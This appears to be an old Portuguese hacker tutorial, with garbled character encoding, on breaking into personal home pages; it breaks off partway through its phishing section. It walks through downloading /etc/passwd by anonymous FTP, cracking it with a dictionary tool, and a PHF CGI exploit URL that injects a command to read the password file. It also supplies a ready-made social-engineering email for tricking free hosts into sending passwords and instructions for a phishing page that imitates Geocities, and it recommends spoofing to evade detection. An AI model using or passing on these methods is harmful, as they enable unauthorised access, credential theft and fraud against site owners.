Texto por: �� � ������ � ��
1-INTRODU��O :
O texto a seguir fala sobre como hackear uma home page. Aqui est�o as suas se��es : Precau��es-cuidados que voc� deve tomar. Sobre as senhas-arquivos falando sobre as senhas. Desencryptando as senhas-como desencryptar senhas. Ftp-como hackear uma HP por ftp. Phf-como hackear uma HP usando o m�todo phf Home page gr�tis-como hackear servidores de home page gr�tis Home page gr�tis 2-Outro m�todo de como hackear servidores de home pages gr�tis J� cadastrado-Como hackear uma home page que voc� j� tenha cadastro no mesmo servidor Telnet e exploits-Como hackear uma page usando telnet e exploits J� cadastrado 2-Outro metodo de como hackear uma hp que voc� j� tenha cadastro no mesmo servidor.
2-PRECAU��ES:
Nesse texto vou ensinar deversos m�todos de como hackear uma home page. Queria avisar que hackear uma home page � considerado crime e que isso d� cadeia. Toda vez que voc� entra em um sistema seu IP fica gravado e "eles" v�o poder te encontrar. Portanto antes de cometer um ato como esse eu sugiro que voc�s tomem umas medidas de seguran�a como spoofing e etc...
3-SOBRE AS SENHAS :
A senha esta em um arquivo chamado passwd. Esse
arquivo est� normalmente em um diret�rio chamado etc/passwd. Ent�o vamos falar um pouco
sobre o passwd. Quando voc� pega o arquivo passwd, a senha pode vir encryptada ou ent�o
com shadow! A diferen�a � que a senha encryptada � a pr�pria senha s� que esta
encryptada e a senha com shadow faz com que a senha fique escondida em outro lugar! Ou
seja, n�o vai estar no passwd, vai estar em outro diret�rio. Para obter a senha escrita
voc� vai ter que desencripta-la! As senhas com shadow s�o imposs�veis de
"desencryptar"! (levando em conta que voc� n�o tem unix). Uma senha encryptada
� mais ou menos assim :
root:User:d7Bdg:1n2HG2:1127:20:Superuser
TomJones:p5Y(h0tiC:1229:20:Tom
Jones,:/usr/people/tomjones:/bin/csh
BBob:EUyd5XAAtv2dA:1129:20:Billy
Bob:/usr/people/bbob:/bin/csh
Agora o exemplo de uma senha com shadow :
root:x:0:1:0000-Admin(0000):/:/usr/bin/csh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/
usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:uid no body:/:
noaccess:x:60002:60002:uid no access:/:
webmastr:x:53:53:WWW
Admin:/export/home/webmastr:/usr/bin/csh
pin4geo:x:55:55:PinPaper
Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false
ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false
Voc� pode notar que tem um "x" no root! Esse x pode ser representado tamb�m por um "*". Agora voc� j� sabe um pouco mais sobre o arquivo passwd e sobre as senhas.
4-DESENCRYPTANDO :
Para desencryptar uma senha precisaremos de tr�s arquivos b�sicos. Uma word list, um desencryptador (recomendo o crackerjack/jack 14)e logicamente o arquivo onde est� senha(passwd). O que � cada um? Word list- Como o pr�prio nome j� diz, � uma lista de palavras. Desencryptador- � o programa que voc� vai usar para desencryptar a senha. Passwd- Nesse arquivo est� a senha encryptada.
Coloque todos esses itens nesse mesmo diret�rio. Abra o prompt do DOS e entre no diret�rio onde eles est�o. Agora fa�a o seguinte, digite : "nome do programa desencryptador" "nome do arquivo onde esta a senha" "nome da sua word list" Ent�o vamos supor que meu programa � o jack, o arquivo � o passwd, a word list � lista. Ent�o ficaria assim : jack passwd lista.txt
E pronto! A senha est� desencryptada! Mas como isso funciona?? Quando voc� roda o jack ele pega o arquivo passwd e testa com todas as palavras da word list.
5-FTP
Hackear uma HP por ftp talvez seja o melhor metodo. � bem simples e r�pido de ser feito. Para fazer isso vamos usar o prompt do MS-DOS. Espero que voc� saiba pelo menos mexer no b�sico do DOS. O que vamos faz � simplesmente entrar no ftp da home page com login anonymous e fazer o download do arquivo passwd. Abra o prompt do DOS. Voc� vai ter que entrar no ftp da HP que voce quer hackear. Normalmente a endere�o � o mesmo da home page. Ent�o digite ftp www.hackers.com Ele vai pedir seu USER. Coloque anonymous. Agora vai pedir que voc� coloque seu e-mail completo como senha. Claro que voc� vai colocar alguma coisa qualquer, tipo [email protected]. Voc� vai entrar no ftp como user anonymous e retrictions applly! Isso significa que voc� entrou como anonymous e com restri��es aplicadas! Agora voc� precisa ir para o diret�rio etc. Entre e fa�a o donwload do passwd. Pra isso digite "get passwd". Pronto, o arquivo passwd vai estar no diret�rio que voc� estava quando entrou no ftp. Tipo windows, arquivos de programas.... Agora voc� que tem o arquivo s� precisa desencryptalo e pronto! A senha estar� em suas m�os..
6-PHF : O phf � com certeza o modo mais simples de
se obter o arquivo passwd. � t�o simples que voc� n�o precisa saber nada! A �nica
coisa que voc� tem que fazer � abrir seu browser e colocar uma URL. Por�m esse m�todo
tem 95% de chance de n�o funcionar! A maioria dos servidores j� acharam o bug e
concertaram. S� colocar essa URL no location do seu browser :
http://Endere�o_da_pagina/cgi-bin/phf?Qalias=x%0a/bin/cat% 20/etc/passwd
Apenas isso e pronto!
7-HACKEANDO SERVIDORES DE HOME PAGES GRATIS (1):
Alguns servidores de home page tipo a geocities, tripod e a angelfire, d�o espa�o para pessoas colocarem suas home pages no ar. H� um modo bem simples de se obter ]a senha de home pages que est�o nesses servidores. Tudo que voce tem que fazer � mandar um e-mail pedindo pra eles te mandarem a senha da home page. Mas n�o mande um e-mail est�pido tipo : "por favor me mandem a senha". Fa�am algo mais convincente. Pegue todas as informa��es da HP poss�veis. Do tipo : "M�s passado eu me cadastrei no servi�o de voc�s e recebi uma senha e um user name e meu endere�o "endere�o da HP do cara". Eu coloquei algumas coisas no meu espa�o e sa� de f�rias. Quando voltei das ferias eu tinha me esquecido da senha!! S� me lembrava do user name, que � : "user name da HP". Fiquei um bom tempo de ferias e n�o pude pagar o provedor, por isso estou com um e-mail diferente do que consta no cadastro de voc�s. O meu antigo e-mail era esse "mail do webmaster da HP" Por favor preciso que voc�s me mandem um e-mail para "seu e-mail". Porque eu n�o tenho o backup dos arquivos que coloquei l� e n�o gostaria de perde-los. Obrigado pela aten��o. Espero que voces mandem a senha o mais r�pido que puderem."
Companhias como a geocities s�o muito ocupadas pra ficar verificando se � verdade eu n�o! Provavelmente eles iram acreditar e em 2 semanas(mais ou menos) voc� receber� a senha no seu e-mail!
8- HACKEANDO SERVIDORES DE HOME PAGES GRATIS (2): Outro modo de hackear esse tipo de home pages � enganar o pr�prio webmaster da HP! Esse modo funciona normalmente com webmasters idiotas que n�o sabem muito coisa e nem percebem que eles mesmos est�o dando a senha para o hackeador. � outro m�todo bem simples mas um pouco mais demorado. O que voc� tem que fazer � criar uma pagina onde voc� finge que � a geocities que esta dando mais megas para HP's! Ou seja, voc� ter� que criar uma p�gina imitando a geocities! Fa�a uma pagina exatamente no estilo da da geo. E coloque tudo com as mesmas gifs, mesmos banners e coloque um formul�rio pra ser preenchido e diga que quem preencher aquilo vai ganhas mais 10 megas livre de espa�o pra HP!!! Nesse formul�rio o cara ter� que colocar o user e a senha da HP, o endere�o e etc.... Para o cara "receber" os megas ele ter� que enviar o formul�rio. Para isso ela dever� clicar em algum bot�o de envio, normalmente um bot�o que fica escrito "submit" Quando a pessoa clica no bot�o submit formul�rio � enviado para a geocities pois aquele bot�o tem um comando para enviar para a geocities.Ent�o o que voc� ter� que fazer � mudar o comando. Em vez do formul�rio ser enviado para a geocities esse formul�rio vai ser enviado para o seu e-mail. Para isso voc� ter� que editar a pagina da geocities. No lugar que tem escrito: